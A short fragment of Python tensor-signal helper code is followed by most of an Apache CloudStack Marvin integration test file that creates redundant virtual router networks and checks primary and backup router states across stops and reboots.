def __init__(self, signals):
self._signal_keys = []
for key in sorted(signals.iterkeys()):
self._signal_keys.append(key)
@property
def num_signals(self):
return len(self._signal_keys)
def unflatten(self, tensor_list):
return dict(zip(self._signal_keys, tensor_list))
@staticmethod
def as_tensor_list(signals):
return [signals[key] for key in sorted(signals.iterkeys())]
def _verify_cross_hosts_transfer_size(tensor_dict, message):
total_size = 0
tensor_structure = {}
for key, tensor in tensor_dict.items():
shape = tensor.shape
size = np.product(shape) * tensor.dtype.size
tensor_structure[key] = shape
total_size += size
if total_size >= _ONE_GIGABYTE:
raise ValueError(
'{} The transfer size is larger than the protobuf limit. Please '
'consider to use Tensors with smaller shapes or reduce batch '
'size. Given:\n'
'{}'.format(message, '\n'.join([
' -- Key: {}, Shape: {}'.format(k, v)
for k, v in tensor_structure.items()])))
|
test_redundant_router.py
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
from nose.plugins.attrib import attr
from marvin.lib.base import (Account,
Router,
NetworkOffering,
Network,
VirtualMachine,
ServiceOffering,
Host)
from marvin.lib.utils import cleanup_resources
from marvin.lib.common import (get_domain,
get_template,
get_zone,
get_process_status)
import time
import multiprocessing
# Import Local Modules
from marvin.cloudstackTestCase import cloudstackTestCase
class TestCreateRvRNetworkOffering(cloudstackTestCase):
@classmethod
def setUpClass(cls):
cls.testClient = super(
TestCreateRvRNetworkOffering,
cls).getClsTestClient()
cls.api_client = cls.testClient.getApiClient()
cls.testdata = cls.testClient.getParsedTestDataConfig()
# Get Zone, Domain and templates
cls.domain = get_domain(cls.api_client)
cls.zone = get_zone(cls.api_client, cls.testClient.getZoneForTests())
cls._cleanup = []
return
@classmethod
def tearDownClass(cls):
try:
# Cleanup resources used
cleanup_resources(cls.api_client, cls._cleanup)
except Exception as e:
raise Exception("Warning: Exception during cleanup : %s" % e)
return
def setUp(self):
self.apiclient = self.testClient.getApiClient()
self.dbclient = self.testClient.getDbConnection()
self.cleanup = []
return
def tearDown(self):
try:
cleanup_resources(self.apiclient, self.cleanup)
except Exception as e:
raise Exception("Warning: Exception during cleanup : %s" % e)
return
@attr(tags=["advanced", "advancedns", "ssh"])
def test_createRvRNetworkOffering(self):
"""Test create RvR supported network offering
"""
# Steps to validate
# 1. create a network offering
# - all services by VirtualRouter
# - enable RedundantRouter servicecapability
# 2. enable the network offering
# Validate the following
# 1. Redundant Router offering should be created successfully and
# listed in listNetworkOfferings response
# assert if RvR capability is enabled
self.debug("Creating network offering with redundant VR capability")
try:
network_offering = NetworkOffering.create(
self.apiclient,
self.testdata["nw_off_isolated_RVR"],
conservemode=True
)
except Exception as e:
self.fail("Create network offering failed! - %s" % e)
self.debug("Enabling network offering - %s" % network_offering.name)
# Enable Network offering
network_offering.update(self.apiclient, state='Enabled')
self.cleanup.append(network_offering)
self.debug("Checking if the network offering created successfully?")
network_offs = NetworkOffering.list(
self.apiclient,
id=network_offering.id,
listall=True
)
self.assertEqual(
isinstance(network_offs, list),
True,
"List network offering should not return empty response"
)
self.assertEqual(
len(network_offs),
1,
"List network off should have newly created network off"
)
for service in network_offs[0].service:
if service.name == 'SourceNat':
self.debug("Verifying SourceNat capabilites")
for capability in service.capability:
if capability.name == 'RedundantRouter':
self.assertTrue(capability.value == 'true')
self.debug("RedundantRouter is enabled")
return
class TestCreateRvRNetwork(cloudstackTestCase):
@classmethod
def setUpClass(cls):
cls.testClient = super(TestCreateRvRNetwork, cls).getClsTestClient()
cls.api_client = cls.testClient.getApiClient()
cls.testdata = cls.testClient.getParsedTestDataConfig()
# Get Zone, Domain and templates
cls.domain = get_domain(cls.api_client)
cls.zone = get_zone(cls.api_client, cls.testClient.getZoneForTests())
cls.template = get_template(
cls.api_client,
cls.zone.id,
cls.testdata["ostype"]
)
cls.testdata["small"]["zoneid"] = cls.zone.id
cls.testdata["small"]["template"] = cls.template.id
cls._cleanup = []
cls.service_offering = ServiceOffering.create(
cls.api_client,
cls.testdata["service_offering"]
)
cls._cleanup.append(cls.service_offering)
cls.network_offering = NetworkOffering.create(
cls.api_client,
cls.testdata["nw_off_isolated_RVR"],
conservemode=True
)
cls._cleanup.append(cls.network_offering)
# Enable Network offering
cls.network_offering.update(cls.api_client, state='Enabled')
return
@classmethod
def tearDownClass(cls):
try:
# Cleanup resources used
cleanup_resources(cls.api_client, cls._cleanup)
except Exception as e:
raise Exception("Warning: Exception during cleanup : %s" % e)
return
def setUp(self):
self.apiclient = self.testClient.getApiClient()
self.dbclient = self.testClient.getDbConnection()
self.account = Account.create(
self.apiclient,
self.testdata["account"],
admin=True,
domainid=self.domain.id
)
self.cleanup = []
self.cleanup.insert(0, self.account)
return
def tearDown(self):
try:
cleanup_resources(self.apiclient, self.cleanup)
except Exception as e:
raise Exception("Warning: Exception during cleanup : %s" % e)
return
@attr(tags=["advanced", "advancedns", "ssh"])
def test_createRvRNetwork(self):
"""Test create network with redundant routers
"""
# Validate the following:
# 1. listNetworkOfferings shows created offering
# 2. listNetworks should show created network in Allocated state
# 3. returns no Running routers in the network
# 4. listVirtualmachines shows VM in Running state
# 5. returns 2 routers
# - same public IP
# - same MAC address of public NIC
# - different guestip address
# - redundant state (PRIMARY or BACKUP)
# - same gateway for the public traffic
# 6. all routers, networks and user VMs are cleaned up
# Creating network using the network offering created
self.debug("Creating network with network offering: %s" %
self.network_offering.id)
network = Network.create(
self.apiclient,
self.testdata["network"],
accountid=self.account.name,
domainid=self.account.domainid,
networkofferingid=self.network_offering.id,
zoneid=self.zone.id
)
self.debug("Created network with ID: %s" % network.id)
networks = Network.list(
self.apiclient,
id=network.id,
listall=True
)
self.assertEqual(
isinstance(networks, list),
True,
"List networks should return a valid response for created network"
)
nw_response = networks[0]
self.debug("Network state: %s" % nw_response.state)
self.assertEqual(
nw_response.state,
"Allocated",
"The network should be in allocated state after creation"
)
self.debug("Listing routers for network: %s" % network.name)
routers = Router.list(
self.apiclient,
networkid=network.id,
listall=True
)
self.assertEqual(
routers,
None,
"Routers should not be spawned when network is in allocated state"
)
self.debug("Deploying VM in account: %s" % self.account.name)
# Spawn an instance in that network
VirtualMachine.create(
self.apiclient,
self.testdata["small"],
accountid=self.account.name,
domainid=self.account.domainid,
serviceofferingid=self.service_offering.id,
networkids=[str(network.id)]
)
self.debug("Deployed VM in network: %s" % network.id)
# wait for VR to update state
time.sleep(self.testdata["sleep"])
self.debug("Listing routers for network: %s" % network.name)
routers = Router.list(
self.apiclient,
networkid=network.id,
listall=True
)
self.assertEqual(
isinstance(routers, list),
True,
"list router should return Primary and backup routers"
)
self.assertEqual(
len(routers),
2,
"Length of the list router should be 2 (Backup & primary)"
)
if routers[0].redundantstate == 'PRIMARY':
primary_router = routers[0]
backup_router = routers[1]
else:
primary_router = routers[1]
backup_router = routers[0]
self.debug("Redundant states: %s, %s" % (
primary_router.redundantstate,
backup_router.redundantstate
))
self.assertEqual(
primary_router.publicip,
backup_router.publicip,
"Public Ip should be same for both(PRIMARY & BACKUP)"
)
self.assertEqual(
primary_router.redundantstate,
"PRIMARY",
"Redundant state of router should be PRIMARY"
)
self.assertEqual(
backup_router.redundantstate,
"BACKUP",
"Redundant state of router should be BACKUP"
)
self.assertNotEqual(
primary_router.guestipaddress,
backup_router.guestipaddress,
"Both (PRIMARY & BACKUP) routers should not have same guest IP"
)
self.assertNotEqual(
primary_router.guestmacaddress,
backup_router.guestmacaddress,
"Both (PRIMARY & BACKUP) routers should not have same guestMAC"
)
return
class TestCreateRvRNetworkNonDefaultGuestCidr(cloudstackTestCase):
@classmethod
def setUpClass(cls):
cls.testClient = super(
TestCreateRvRNetworkNonDefaultGuestCidr,
cls).getClsTestClient()
cls.api_client = cls.testClient.getApiClient()
cls.testdata = cls.testClient.getParsedTestDataConfig()
# Get Zone, Domain and templates
cls.domain = get_domain(cls.api_client)
cls.zone = get_zone(cls.api_client, cls.testClient.getZoneForTests())
cls.template = get_template(
cls.api_client,
cls.zone.id,
cls.testdata["ostype"]
)
cls.testdata["small"]["zoneid"] = cls.zone.id
cls.testdata["small"]["template"] = cls.template.id
cls._cleanup = []
cls.service_offering = ServiceOffering.create(
cls.api_client,
cls.testdata["service_offering"]
)
cls._cleanup.append(cls.service_offering)
cls.network_offering = NetworkOffering.create(
cls.api_client,
cls.testdata["nw_off_isolated_RVR"],
conservemode=True
)
cls._cleanup.append(cls.network_offering)
# Enable Network offering
cls.network_offering.update(cls.api_client, state='Enabled')
return
@classmethod
def tearDownClass(cls):
try:
# Cleanup resources used
cleanup_resources(cls.api_client, cls._cleanup)
except Exception as e:
raise Exception("Warning: Exception during cleanup : %s" % e)
return
def setUp(self):
self.apiclient = self.testClient.getApiClient()
self.dbclient = self.testClient.getDbConnection()
self.account = Account.create(
self.apiclient,
self.testdata["account"],
admin=True,
domainid=self.domain.id
)
self.cleanup = []
self.cleanup.insert(0, self.account)
return
def tearDown(self):
try:
cleanup_resources(self.apiclient, self.cleanup)
except Exception as e:
raise Exception("Warning: Exception during cleanup : %s" % e)
return
@attr(tags=["advanced", "advancedns"])
def test_createRvRNetwork(self):
"""Test create network with non-default guest cidr with redundant routers
"""
# Validate the following:
# 1. listNetworkOfferings shows created offering
# 2. listNetworks should show created network in Allocated state
# - gw = 192.168.2.1 and cidr = 192.168.2.0/23
# 3. returns no Running routers in the network
# 4. listVirtualmachines shows VM in Running state
# 5. returns 2 routers
# - same public IP
# - same MAC address of public NIC
# - different guestip address
# - redundant state (PRIMARY or BACKUP)
# - same gateway for the public traffic
# 6. all routers, networks and user VMs are cleaned up
# Creating network using the network offering created
self.debug("Creating network with network offering: %s" %
self.network_offering.id)
network = Network.create(
self.apiclient,
self.testdata["network"],
accountid=self.account.name,
domainid=self.account.domainid,
networkofferingid=self.network_offering.id,
zoneid=self.zone.id,
netmask='255.255.254.0',
gateway='192.168.2.1'
)
self.debug("Created network with ID: %s" % network.id)
networks = Network.list(
self.apiclient,
id=network.id,
listall=True
)
self.assertEqual(
isinstance(networks, list),
True,
"List networks should return a valid response for created network"
)
nw_response = networks[0]
self.debug("Network state: %s" % nw_response.state)
self.assertEqual(
nw_response.state,
"Allocated",
"The network should be in allocated state after creation"
)
self.assertEqual(
nw_response.gateway,
'192.168.2.1',
"The gateway should be 192.168.2.1"
)
self.assertEqual(
nw_response.cidr,
'192.168.2.0/23',
"Guest cidr should be 192.168.2.0/23 but is %s" % nw_response.cidr
)
self.debug("Listing routers for network: %s" % network.name)
routers = Router.list(
self.apiclient,
networkid=network.id,
listall=True
)
self.assertEqual(
routers,
None,
"Routers should not be spawned when network is in allocated state"
)
self.debug("Deploying VM in account: %s" % self.account.name)
# Spawn an instance in that network
VirtualMachine.create(
self.apiclient,
self.testdata["small"],
accountid=self.account.name,
domainid=self.account.domainid,
serviceofferingid=self.service_offering.id,
networkids=[str(network.id)]
)
self.debug("Deployed VM in network: %s" % network.id)
# wait for VR to update state
time.sleep(self.testdata["sleep"])
self.debug("Listing routers for network: %s" % network.name)
routers = Router.list(
self.apiclient,
networkid=network.id,
listall=True
)
self.assertEqual(
isinstance(routers, list),
True,
"list router should return Primary and backup routers"
)
self.assertEqual(
len(routers),
2,
"Length of the list router should be 2 (Backup & Primary)"
)
if routers[0].redundantstate == 'PRIMARY':
primary_router = routers[0]
backup_router = routers[1]
else:
primary_router = routers[1]
backup_router = routers[0]
self.assertEqual(
primary_router.publicip,
backup_router.publicip,
"Public Ip should be same for both(PRIMARY & BACKUP)"
)
self.assertEqual(
primary_router.redundantstate,
"PRIMARY",
"Redundant state of router should be PRIMARY"
)
self.assertEqual(
backup_router.redundantstate,
"BACKUP",
"Redundant state of router should be BACKUP"
)
self.assertNotEqual(
primary_router.guestipaddress,
backup_router.guestipaddress,
"Both (PRIMARY & BACKUP) routers should not have same guest IP"
)
self.assertNotEqual(
primary_router.guestmacaddress,
backup_router.guestmacaddress,
"Both (PRIMARY & BACKUP) routers should not have same guestMAC"
)
return
class TestRVRInternals(cloudstackTestCase):
@classmethod
def setUpClass(cls):
cls.testClient = super(TestRVRInternals, cls).getClsTestClient()
cls.api_client = cls.testClient.getApiClient()
cls.testdata = cls.testClient.getParsedTestDataConfig()
# Get Zone, Domain and templates
cls.domain = get_domain(cls.api_client)
cls.zone = get_zone(cls.api_client, cls.testClient.getZoneForTests())
cls.template = get_template(
cls.api_client,
cls.zone.id,
cls.testdata["ostype"]
)
cls.testdata["small"]["zoneid"] = cls.zone.id
cls.testdata["small"]["template"] = cls.template.id
cls._cleanup = []
cls.service_offering = ServiceOffering.create(
cls.api_client,
cls.testdata["service_offering"]
)
cls._cleanup.append(cls.service_offering)
cls.network_offering = NetworkOffering.create(
cls.api_client,
cls.testdata["nw_off_isolated_RVR"],
conservemode=True
)
cls._cleanup.append(cls.network_offering)
# Enable Network offering
cls.network_offering.update(cls.api_client, state='Enabled')
return
@classmethod
def tearDownClass(cls):
try:
# Cleanup resources used
cleanup_resources(cls.api_client, cls._cleanup)
except Exception as e:
raise Exception("Warning: Exception during cleanup : %s" % e)
return
def setUp(self):
self.apiclient = self.testClient.getApiClient()
self.hypervisor = self.testClient.getHypervisorInfo()
self.dbclient = self.testClient.getDbConnection()
self.account = Account.create(
self.apiclient,
self.testdata["account"],
admin=True,
domainid=self.domain.id
)
self.cleanup = []
self.cleanup.insert(0, self.account)
return
def tearDown(self):
try:
cleanup_resources(self.apiclient, self.cleanup)
except Exception as e:
raise Exception("Warning: Exception during cleanup : %s" % e)
return
# @attr(tags=["advanced", "advancedns", "ssh"])
@attr(tags=["TODO"])
def test_redundantVR_internals(self):
"""Test redundant router internals
"""
# Steps to validate
# 1. createNetwork using network offering for redundant virtual router
# 2. listRouters in above network
# 3. deployVM in above user account in the created network
# 4. login to both Redundant Routers
# 5. login to user VM
# 6. delete user account
# Validate the following:
# 1. listNetworks lists network in Allocated state
# 2. listRouters lists no routers created yet
# 3. listRouters returns Primary and Backup routers
# 4. ssh in to both routers and verify:
# - PRIMARY router has eth2 with public Ip address
# - BACKUP router has only guest eth0 and link local eth1
# - Broadcast on PRIMARY eth2 is non-zero (0.0.0.0)
# - execute checkrouter.sh in router home and check if it is status
# "PRIMARY|BACKUP" as returned by the listRouters API
# 5. DNS of the user VM is set to RedundantRouter Gateway
# (/etc/resolv.conf)
# Check that the default gateway for the guest is the rvr gateway
# and not the guestIp of either of the RvRs
# Creating network using the network offering created
self.debug("Creating network with network offering: %s" %
self.network_offering.id)
network = Network.create(
self.apiclient,
self.testdata["network"],
accountid=self.account.name,
domainid=self.account.domainid,
networkofferingid=self.network_offering.id,
zoneid=self.zone.id
)
self.debug("Created network with ID: %s" % network.id)
networks = Network.list(
self.apiclient,
id=network.id,
listall=True
)
self.assertEqual(
isinstance(networks, list),
True,
"List networks should return a valid response for created network"
)
nw_response = networks[0]
self.debug("Network state: %s" % nw_response.state)
self.assertEqual(
nw_response.state,
"Allocated",
"The network should be in allocated state after creation"
)
self.debug("Listing routers for network: %s" % network.name)
routers = Router.list(
self.apiclient,
networkid=network.id,
listall=True
)
self.assertEqual(
routers,
None,
"Routers should not be spawned when network is in allocated state"
)
self.debug("Deploying VM in account: %s" % self.account.name)
# Spawn an instance in that network
virtual_machine = VirtualMachine.create(
self.apiclient,
self.testdata["small"],
accountid=self.account.name,
domainid=self.account.domainid,
serviceofferingid=self.service_offering.id,
networkids=[str(network.id)]
)
self.debug("Deployed VM in network: %s" % network.id)
# wait for VR to update state
time.sleep(self.testdata["sleep"])
self.debug("Listing routers for network: %s" % network.name)
routers = Router.list(
self.apiclient,
networkid=network.id,
listall=True
)
self.assertEqual(
isinstance(routers, list),
True,
"list router should return Primary and backup routers"
)
self.assertEqual(
len(routers),
2,
"Length of the list router should be 2 (Backup & Primary)"
)
if routers[0].redundantstate == 'PRIMARY':
primary_router = routers[0]
backup_router = routers[1]
else:
primary_router = routers[1]
backup_router = routers[0]
self.debug("Fetching the host details for double hop into router")
hosts = Host.list(
self.apiclient,
id=primary_router.hostid
)
self.assertEqual(
isinstance(hosts, list),
True,
"List hosts should return a valid list"
)
primary_host = hosts[0]
self.debug("Host for primary router: %s" % primary_host.name)
self.debug("Host for primary router: %s" % primary_host.ipaddress)
hosts = Host.list(
self.apiclient,
id=backup_router.hostid
)
self.assertEqual(
isinstance(hosts, list),
True,
"List hosts should return a valid list"
)
backup_host = hosts[0]
self.debug("Host for backup router: %s" % backup_host.name)
self.debug("Host for backup router: %s" % backup_host.ipaddress)
self.debug(primary_router.linklocalip)
# Check eth2 port for primary router
if self.hypervisor.lower() in ('vmware', 'hyperv'):
result = get_process_status(
self.apiclient.connection.mgtSvr,
22,
self.apiclient.connection.user,
self.apiclient.connection.passwd,
primary_router.linklocalip,
'ip addr show eth2',
hypervisor=self.hypervisor
)
else:
result = get_process_status(
primary_host.ipaddress,
22,
self.testdata['configurableData']['host']["username"],
self.testdata['configurableData']['host']["password"],
primary_router.linklocalip,
"ip addr show eth2"
)
res = str(result)
self.debug("Command 'ip addr show eth2': %s" % result)
self.debug("Router's public Ip: %s" % primary_router.publicip)
self.assertEqual(
res.count("state UP"),
1,
"PRIMARY router's public interface should be UP"
)
self.assertEqual(
result.count('brd 0.0.0.0'),
0,
"Broadcast address of eth2 should not be 0.0.0.0"
)
# Check eth2 port for backup router
if self.hypervisor.lower() in ('vmware', 'hyperv'):
result = get_process_status(
self.apiclient.connection.mgtSvr,
22,
self.apiclient.connection.user,
self.apiclient.connection.passwd,
backup_router.linklocalip,
'ip addr show eth2',
hypervisor=self.hypervisor
)
else:
result = get_process_status(
backup_host.ipaddress,
22,
self.testdata['configurableData']['host']["username"],
self.testdata['configurableData']['host']["password"],
backup_router.linklocalip,
"ip addr show eth2"
)
res = str(result)
self.debug("Command 'ip addr show eth2': %s" % result)
self.assertEqual(
res.count("state DOWN"),
1,
"BACKUP router's public interface should be DOWN"
)
self.assertEqual(
result.count('brd 0.0.0.0'),
0,
"Broadcast address of eth2 should not be 0.0.0.0"
)
vms = VirtualMachine.list(
self.apiclient,
id=virtual_machine.id,
listall=True
)
self.assertEqual(
isinstance(vms, list),
True,
"List VMs should not return empty response"
)
vm = vms[0]
self.assertNotEqual(
vm.nic[0].gateway,
primary_router.publicip,
"The gateway of user VM should be same as primary router"
)
self.assertNotEqual(
vm.nic[0].gateway,
backup_router.publicip,
"The gateway of user VM should be same as backup router"
)
return
class TestRvRRedundancy(cloudstackTestCase):
@classmethod
def setUpClass(cls):
cls.testClient = super(TestRvRRedundancy, cls).getClsTestClient()
cls.api_client = cls.testClient.getApiClient()
cls.testdata = cls.testClient.getParsedTestDataConfig()
# Get Zone, Domain and templates
cls.domain = get_domain(cls.api_client)
cls.zone = get_zone(cls.api_client, cls.testClient.getZoneForTests())
cls.template = get_template(
cls.api_client,
cls.zone.id,
cls.testdata["ostype"]
)
cls.testdata["small"]["zoneid"] = cls.zone.id
cls.testdata["small"]["template"] = cls.template.id
cls._cleanup = []
cls.service_offering = ServiceOffering.create(
cls.api_client,
cls.testdata["service_offering"]
)
cls._cleanup.append(cls.service_offering)
cls.network_offering = NetworkOffering.create(
cls.api_client,
cls.testdata["nw_off_isolated_RVR"],
conservemode=True
)
cls.network_offering_for_update=NetworkOffering.create(
cls.api_client,
cls.testdata["nw_off_isolated_RVR"],
conservemode=True
)
cls._cleanup.append(cls.network_offering_for_update)
cls._cleanup.append(cls.network_offering)
# Enable Network offering
cls.network_offering.update(cls.api_client, state='Enabled')
cls.network_offering_for_update.update(cls.api_client, state='Enabled')
return
@classmethod
def tearDownClass(cls):
try:
# Cleanup resources used
cleanup_resources(cls.api_client, cls._cleanup)
except Exception as e:
raise Exception("Warning: Exception during cleanup : %s" % e)
return
def setUp(self):
self.apiclient = self.testClient.getApiClient()
self.dbclient = self.testClient.getDbConnection()
self.cleanup = []
self.account = Account.create(
self.apiclient,
self.testdata["account"],
admin=True,
domainid=self.domain.id
)
self.cleanup.insert(0, self.account)
# Creating network using the network offering created
self.debug("Creating network with network offering: %s" %
self.network_offering.id)
self.network = Network.create(
self.apiclient,
self.testdata["network"],
accountid=self.account.name,
domainid=self.account.domainid,
networkofferingid=self.network_offering.id,
zoneid=self.zone.id
)
self.debug("Created network with ID: %s" % self.network.id)
self.debug("Deploying VM in account: %s" % self.account.name)
# Spawn an instance in that network
self.virtual_machine = VirtualMachine.create(
self.apiclient,
self.testdata["small"],
accountid=self.account.name,
domainid=self.account.domainid,
serviceofferingid=self.service_offering.id,
networkids=[str(self.network.id)]
)
self.debug("Deployed VM in network: %s" % self.network.id)
# wait for VR to update state
time.sleep(self.testdata["sleep"])
return
def tearDown(self):
try:
cleanup_resources(self.apiclient, self.cleanup)
except Exception as e:
raise Exception("Warning: Exception during cleanup : %s" % e)
return
@attr(tags=["advanced", "advancedns", "ssh"])
def test_01_stopPrimaryRvR(self):
"""Test stop primary RVR
"""
# Steps to validate
# 1. createNetwork using network offering for redundant virtual router
# listNetworks returns the allocated network
# 2. listRouters in above network. Lists no routers in the created
# network
# 3. deployVM in above user account in the created network. VM is
# successfully Running
# 4. listRouters that has redundantstate=PRIMARY. only one router is
# returned with redundantstate = PRIMARY for this network
# 5. stopRouter that is Primary. Router goes to stopped state
# successfully
# 6. listRouters in the account and in the network. Lists old PRIMARY
# router in redundantstate=UNKNOWN, and the old BACKUP router as
# new PRIMARY
# 7. start the stopped router. Stopped rvr starts up successfully and
# is in Running state
# 8. listRouters in the account and in the network. Router shows up as
# BACKUP and NOT PRIMARY, should have only one BACKUP and one PRIMARY
# at the end, public IP of the SourceNAT should remain same after
# reboot
# 9. delete the account
self.debug("Listing routers for network: %s" % self.network.name)
routers = Router.list(
self.apiclient,
networkid=self.network.id,
listall=True
)
self.assertEqual(
isinstance(routers, list),
True,
"list router should return Primary and backup routers"
)
self.assertEqual(
len(routers),
2,
"Length of the list router should be 2 (Backup & Primary)"
)
if routers[0].redundantstate == 'PRIMARY':
primary_router = routers[0]
backup_router = routers[1]
else:
primary_router = routers[1]
backup_router = routers[0]
self.debug("Stopping the PRIMARY router")
try:
Router.stop(self.apiclient, id=primary_router.id)
except Exception as e:
self.fail("Failed to stop primary router: %s" % e)
# wait for VR to update state
time.sleep(self.testdata["sleep"])
self.debug("Listing routers for network: %s" % self.network.name)
routers = Router.list(
self.apiclient,
id=primary_router.id,
listall=True
)
self.assertEqual(
isinstance(routers, list),
True,
"list router should return Primary and backup routers"
)
self.assertIn(
routers[0].redundantstate, [
'UNKNOWN', 'FAULT'], "Redundant state of the primary router\
should be UNKNOWN/FAULT but is %s" %
routers[0].redundantstate)
self.debug(
"Checking state of the backup router in %s" %
self.network.name)
routers = Router.list(
self.apiclient,
id=backup_router.id,
listall=True
)
self.assertEqual(
isinstance(routers, list),
True,
"list router should return backup router"
)
self.assertEqual(
routers[0].redundantstate,
'PRIMARY',
"Redundant state of the router should be PRIMARY but is %s" %
routers[0].redundantstate)
self.debug("Starting the old PRIMARY router")
try:
Router.start(self.apiclient, id=primary_router.id)
self.debug("old PRIMARY router started")
except Exception as e:
self.fail("Failed to start primary router: %s" % e)
# wait for VR to update state
time.sleep(self.testdata["sleep"])
self.debug(
"Checking state of the primary router in %s" %
self.network.name)
routers = Router.list(
self.apiclient,
id=primary_router.id,
listall=True
)
self.assertEqual(
isinstance(routers, list),
True,
"list router should return backup router"
)
self.assertEqual(
routers[0].redundantstate,
'BACKUP',
"Redundant state of the router should be BACKUP but is %s" %
routers[0].redundantstate)
self.assertEqual(
primary_router.publicip,
routers[0].publicip,
"Public IP should be same after reboot"
)
return
@attr(tags=["advanced", "advancedns", "ssh"])
def test_02_stopBackupRvR(self):
"""Test stop backup RVR
"""
# Steps to validate
# 1. createNetwork using network offering for redundant virtual router
# listNetworks returns the allocated network
# 2. listRouters in above network. Lists no routers in the created
# network
# 3. deployVM in above user account in the created network. VM is
# successfully Running
# 4. listRouters that has redundantstate=PRIMARY. only one router is
# returned with redundantstate = PRIMARY for this network
# 5. stopRouter that is BACKUP. Router goes to stopped state
# successfully
# 6. listRouters in the account and in the network. Lists old PRIMARY
# router in redundantstate=UNKNOWN
# 7. start the stopped router. Stopped rvr starts up successfully and
# is in Running state
# 8. listRouters in the account and in the network. Router shows up as
# BACKUP and NOT PRIMARY, should have only one BACKUP and one PRIMARY
# at the end, public IP of the SourceNAT should remain same after
# reboot
# 9. delete the account
self.debug("Listing routers for network: %s" % self.network.name)
routers = Router.list(
self.apiclient,
networkid=self.network.id,
listall=True
)
self.assertEqual(
isinstance(routers, list),
True,
"list router should return Primary and backup routers"
)
self.assertEqual(
len(routers),
2,
"Length of the list router should be 2 (Backup & Primary)"
)
if routers[0].redundantstate == 'PRIMARY':
primary_router = routers[0]
backup_router = routers[1]
else:
primary_router = routers[1]
backup_router = routers[0]
self.debug("Stopping the BACKUP router")
try:
Router.stop(self.apiclient, id=backup_router.id)
except Exception as e:
self.fail("Failed to stop backup router: %s" % e)
# wait for VR update state
time.sleep(self.testdata["sleep"])
self.debug(
"Checking state of the backup router in %s" %
self.network.name)
routers = Router.list(
self.apiclient,
id=backup_router.id,
listall=True
)
self.assertEqual(
isinstance(routers, list),
True,
"list router should return Primary and backup routers"
)
self.assertIn(
routers[0].redundantstate, [
'UNKNOWN', 'FAULT'], "Redundant state of the backup router\
should be UNKNOWN/FAULT but is %s" %
routers[0].redundantstate)
self.debug(
"Checking state of the primary router in %s" %
self.network.name)
routers = Router.list(
self.apiclient,
id=primary_router.id,
listall=True
)
self.assertEqual(
isinstance(routers, list),
True,
"list router should return Primary and backup routers"
)
self.assertEqual(
routers[0].redundantstate,
'PRIMARY',
"Redundant state of the router should be PRIMARY but is %s" %
routers[0].redundantstate)
self.debug("Starting the old BACKUP router")
try:
Router.start(self.apiclient, id=backup_router.id)
self.debug("old BACKUP router started")
except Exception as e:
self.fail("Failed to stop primary router: %s" % e)
# wait for VR to start and update state
time.sleep(self.testdata["sleep"])
self.debug(
"Checking state of the backup router in %s" %
self.network.name)
routers = Router.list(
self.apiclient,
id=backup_router.id,
listall=True
)
self.assertEqual(
isinstance(routers, list),
True,
"list router should return backup router"
)
self.assertEqual(
routers[0].redundantstate,
'BACKUP',
"Redundant state of the router should be BACKUP but is %s" %
routers[0].redundantstate)
self.assertEqual(
backup_router.publicip,
routers[0].publicip,
"Public IP should be same after reboot"
)
return
@attr(tags=["advanced", "advancedns", "ssh"])
def test_03_rebootPrimaryRvR(self):
"""Test reboot primary RVR
"""
# Steps to validate
# 1. createNetwork using network offering for redundant virtual router
# listNetworks returns the allocated network
# 2. listRouters in above network. Lists no routers in the created
# network
# 3. deployVM in above user account in the created network. VM is
# successfully Running
# 4. listRouters that has redundantstate=PRIMARY. only one router is
# returned with redundantstate = PRIMARY for this network
# 5. reboot router that is PRIMARY. Router reboots state
# successfully
# 6. lists old PRIMARY router in redundantstate=BACKUP and the old
# BACKUP router as new PRIMARY + public IP of the SourceNAT should
# remain same after the reboot
self.debug("Listing routers for network: %s" % self.network.name)
routers = Router.list(
self.apiclient,
networkid=self.network.id,
listall=True
)
self.assertEqual(
isinstance(routers, list),
True,
"list router should return Primary and backup routers"
)
self.assertEqual(
len(routers),
2,
"Length of the list router should be 2 (Backup & Primary)"
)
if routers[0].redundantstate == 'PRIMARY':
primary_router = routers[0]
backup_router = routers[1]
else:
primary_router = routers[1]
backup_router = routers[0]
self.debug("Rebooting the primary router")
try:
Router.reboot(self.apiclient, id=primary_router.id)
except Exception as e:
self.fail("Failed to reboot PRIMARY router: %s" % e)
# wait for VR to update state
time.sleep(self.testdata["sleep"])
self.debug(
"Checking state of the primary router in %s" %
self.network.name)
routers = Router.list(
self.apiclient,
id=primary_router.id,
listall=True
)
self.assertEqual(
isinstance(routers, list),
True,
"list router should return Primary and backup routers"
)
self.assertEqual(
routers[0].redundantstate,
'BACKUP',
"Redundant state of the router should be BACKUP but is %s" %
routers[0].redundantstate)
self.debug(
"Checking state of the backup router in %s" %
self.network.name)
routers = Router.list(
self.apiclient,
id=backup_router.id,
listall=True
)
self.assertEqual(
isinstance(routers, list),
True,
"list router should return Primary and backup routers"
)
self.assertEqual(
routers[0].redundantstate,
'PRIMARY',
"Redundant state of the router should be PRIMARY but is %s" %
routers[0].redundantstate)
self.assertEqual(
primary_router.publicip,
routers[0].publicip,
"Public IP should be same after reboot"
)
return
@attr(tags=["advanced", "advancedns", "ssh"])
def test_04_rebootBackupRvR(self):
"""Test reboot backup RVR
"""
# Steps to validate
# 1. createNetwork using network offering for redundant virtual router
# listNetworks returns the allocated network
# 2. listRouters in above network. Lists no routers in the created
# network
# 3. deployVM in above user account in the created network. VM is
# successfully Running
# 4. listRouters that has redundantstate=PRIMARY. only one router is
# returned with redundantstate = PRIMARY for this network
# 5. reboot router that is BACKUP. Router reboots state
# successfully
# 6. lists old BACKUP router in redundantstate=BACKUP, and the old
# PRIMARY router is still PRIMARY+ public IP of the SourceNAT should
# remain same after the reboot
self.debug("Listing routers for network: %s" % self.network.name)
routers = Router.list(
self.apiclient,
networkid=self.network.id,
listall=True
)
self.assertEqual(
isinstance(routers, list),
True,
"list router should return Primary and backup routers"
)
self.assertEqual(
len(routers),
2,
"Length of the list router should be 2 (Backup & Primary)"
)
if routers[0].redundantstate == 'PRIMARY':
primary_router = routers[0]
backup_router = routers[1]
else:
primary_router = routers[1]
backup_router = routers[0]
